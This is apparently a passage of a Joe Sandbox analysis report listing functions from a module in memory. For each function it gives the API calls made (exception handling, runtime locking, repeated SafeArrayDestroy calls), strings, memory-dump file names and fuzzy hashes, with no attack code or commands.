Instruction Fuzzy Hash: BD31B4327042148FE3258FACE880B6AF3F5AF91728B304A2FE556CFB40D765D8408792

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4DC40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE4DCC5

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE4DCDA

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE4DD09
__CxxThrowException@8.LIBCMT ref: 6CE4DD1E

Strings

0Bl, xrefs: 6CE4DD17
0Bl, xrefs: 6CE4DCD3

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID: 0Bl$0Bl
API String ID: 399550787-1774228455
Opcode ID: 8bfe4d93616e09dc37edd143ebbc4a232f406bec7b78482ee73c04c801340022
Instruction ID: 879170ceccd207c98f1bb515e40d7919810ee9ba47d469988ad8d0f458d45853
Opcode Fuzzy Hash: 8bfe4d93616e09dc37edd143ebbc4a232f406bec7b78482ee73c04c801340022
Instruction Fuzzy Hash: 243121B6D002089FDB04CF99E841AEEB7F8BF55704F24856EE91997750D770EA04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE944E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6CE94532
DName::operator+.LIBCMT ref: 6CE94539
DName::DName.LIBCMT ref: 6CE9455B
DName::operator+.LIBCMT ref: 6CE94562
DName::operator+.LIBCMT ref: 6CE94569

Strings

throw(, xrefs: 6CE9452A, 6CE94553

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: bbe518fa676e3947279cbed6a1bf846fd3337789ace804b7c259020189d6fb6b
Instruction ID: 7ca8cac13d8193fc17bb72dbe51b16d40fd1af5966cc30034a1dacd592f29502
Opcode Fuzzy Hash: bbe518fa676e3947279cbed6a1bf846fd3337789ace804b7c259020189d6fb6b
Instruction Fuzzy Hash: 3901B5B5A00109AFCF04DFA4C855DED7BB9EB4530CF20415AF915AB794EB30DA4A8790

Uniqueness

Uniqueness Score: -1.00%

Function 6CE8E9B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6CEB9880,00000008,6CE8EAC1,00000000,00000000,?,?,6CE8D7DD,6CE89DEF,00000000,?,6CE89BD4,6CE21290,CB65479A), ref: 6CE8E9CA
__lock.LIBCMT ref: 6CE8E9FE

Part of subcall function 6CE92438: __mtinitlocknum.LIBCMT ref: 6CE9244E
Part of subcall function 6CE92438: __amsg_exit.LIBCMT ref: 6CE9245A
Part of subcall function 6CE92438: EnterCriticalSection.KERNEL32(6CE89BD4,6CE89BD4,?,6CE8EA03,0000000D), ref: 6CE92462

InterlockedIncrement.KERNEL32(FFFFFEF5), ref: 6CE8EA0B
__lock.LIBCMT ref: 6CE8EA1F
___addlocaleref.LIBCMT ref: 6CE8EA3D

Strings

KERNEL32.DLL, xrefs: 6CE8E9C5

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 40f2c82a8487034a134b159277a421090c363667c338314a37a1a2f233f45dec
Instruction ID: 7a42369bce1bbda7cf60d6d50df1e9536d3d8823b8c1c9f992be2b2fc695d1e3
Opcode Fuzzy Hash: 40f2c82a8487034a134b159277a421090c363667c338314a37a1a2f233f45dec
Instruction Fuzzy Hash: 0F01AD71445B00DED7209FAAD505789FBF0FF11318F30894ED49A97BA0CBB8A604CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6CE48A9A Relevance: 9.1, APIs: 6, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: c12ce6f4ae1421c4fd43965d6e48798fb407b382fd0ed1eede1c8d103bb82c8d
Instruction ID: 6f182f915155c7c908a919f7158c8149222203898634bfbb69aefc0aca1b883b
Opcode Fuzzy Hash: c12ce6f4ae1421c4fd43965d6e48798fb407b382fd0ed1eede1c8d103bb82c8d
Instruction Fuzzy Hash: A6415A74A016089FCB00CFA9D980E5AB7FAAF89308F30859AE519EB755DB71E841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE48DE8 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 5b6b04ed4464def1aa341749ed811e9de0ae059ea6e087ed11a770d711c0ee17
Instruction ID: c2d7b02c54a9eb9de095c1ced2bc808e998ebbde4302999a9eeac3afdd0aec61
Opcode Fuzzy Hash: 5b6b04ed4464def1aa341749ed811e9de0ae059ea6e087ed11a770d711c0ee17
Instruction Fuzzy Hash: C9415D71A016189FDB00DFA8DC80F9EB7B9AF89204F70859AE518EB751C731E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE40338 Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 5b6b04ed4464def1aa341749ed811e9de0ae059ea6e087ed11a770d711c0ee17
Instruction ID: a393b488abb7b6a35bb6058e8b7dbfe8ecde168d1f7515c198735b73575846f7
Opcode Fuzzy Hash: 5b6b04ed4464def1aa341749ed811e9de0ae059ea6e087ed11a770d711c0ee17
Instruction Fuzzy Hash: 0B415BB0A016089FDB00CFA9DC84B9DBBBAAF99204F34859AE518E7751CB31ED41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE48CE7 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 79c0df8c39bf3bc6ca9f83e97905754954b505a42a6fdfd696114be9c780cb7a
Instruction ID: bf94603800cca54701a8dcdf0bd5883d44ca14d0cb149113ed1bdaf7b1465422
Opcode Fuzzy Hash: 79c0df8c39bf3bc6ca9f83e97905754954b505a42a6fdfd696114be9c780cb7a
Instruction Fuzzy Hash: 5D311970A016189FCB10CBA8DC80F9EB7B9AF89218F70869AE419E7755C771E981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE48F83 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: e9d3cc5080bf7337e253617f53960ede3df555328a8926190a54c99772278837
Instruction ID: f3474d600f30299574d4ff6b2c88ca211216f7d2aa81e0b5e199d25d341fbaee
Opcode Fuzzy Hash: e9d3cc5080bf7337e253617f53960ede3df555328a8926190a54c99772278837
Instruction Fuzzy Hash: DF311970A016089FCB10DFA8DC80B9EB7B9AF89218F70859AE519E7751CB75E9818B50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE48BDD Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 7d3767c8840de71fc25ffbaaac4a59edc48399894d352f4468951e0cc29f4d27
Instruction ID: 5ce59878323a62038f5d4f74235eb2e42d9240b16fd75535e195d5c3ac3e5930
Opcode Fuzzy Hash: 7d3767c8840de71fc25ffbaaac4a59edc48399894d352f4468951e0cc29f4d27
Instruction Fuzzy Hash: DB314770E016089FCB10CFA8D880F9EB7B9AF89218F30859AE419E7751CB71E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE404D3 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: e9d3cc5080bf7337e253617f53960ede3df555328a8926190a54c99772278837
Instruction ID: 8391863860c88b4e34e6dbc08ebaedaaf5b9ecb5a1431672994f13cdcc009e5a
Opcode Fuzzy Hash: e9d3cc5080bf7337e253617f53960ede3df555328a8926190a54c99772278837
Instruction Fuzzy Hash: AA312A70A016089FCB10DFA9DC84B9EB7BAAF99308F30859AE518E7751CB75E9418B50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE405DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 6e59c660b50cbd90f867b8647aff61f1c54f60e7335049688501bd85103d7d54
Instruction ID: 1a0b586acc39e297746f16726aed7e7a8ae6007292aadfa8ecb37a60c40a3c0f
Opcode Fuzzy Hash: 6e59c660b50cbd90f867b8647aff61f1c54f60e7335049688501bd85103d7d54
Instruction Fuzzy Hash: C93148B0A016189FCB00CFA9DD84B9DB7BAAF99208F30859AE418E7741DB75ED41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE40668 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE423B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CE423FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4240F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 9291255a228972fbca56ca62b7536949e827b7b1839b577b4e9208f617afa5bf
Instruction ID: 92e7b7cc2aa6aea2b30fb6ac2880d422cfc4e2805c6bd3e5664bb36626f9ad1a
Opcode Fuzzy Hash: 9291255a228972fbca56ca62b7536949e827b7b1839b577b4e9208f617afa5bf
Instruction Fuzzy Hash: 5C314A70A016089FCB00CFA9DD84B9DB7BAAF99208F30859AE519E7741CB71E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4908A Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 6e59c660b50cbd90f867b8647aff61f1c54f60e7335049688501bd85103d7d54
Instruction ID: 5de2cfa8866407ad518c8f7e11bb46f67e573abc73e0d4a5be81408c3f602d64
Opcode Fuzzy Hash: 6e59c660b50cbd90f867b8647aff61f1c54f60e7335049688501bd85103d7d54
Instruction Fuzzy Hash: FE312870E016189FCB00CFA8D980F9EB7B9AF89218F30859AE519E7751D775E981CF50

Uniqueness

Uniqueness Score: -1.00%

